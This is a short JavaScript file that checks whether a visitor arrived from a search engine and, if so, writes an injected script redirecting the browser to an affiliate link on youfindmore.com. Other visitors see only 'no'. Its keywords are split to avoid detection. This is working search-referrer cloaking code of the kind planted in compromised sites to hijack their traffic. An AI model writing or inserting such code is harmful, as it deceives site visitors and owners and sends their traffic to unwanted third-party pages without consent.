// JavaScript Document
function R(){
var Ref=document.referrer;

if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.bing.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('.aol.')!=-1 || Ref.indexOf('.ask.')!=-1 || Ref.indexOf('.altavista.')!=-1 || Ref.indexOf('.bing.')!=-1 || Ref.indexOf('.live.')!=-1  || Ref.indexOf('.lucos.')!=-1 || Ref.indexOf('.digg.')!=-1 || Ref.indexOf('.msn.')!=-1)
{ document.write('<script language="javascript">docu'+'ment.location="http://www.youfindmore.com/cars/?aid=3354&subid=esuga&q=nissan maxima&n=10"</s'+'cript>')}

else {
document.write('no');
}
}

R();

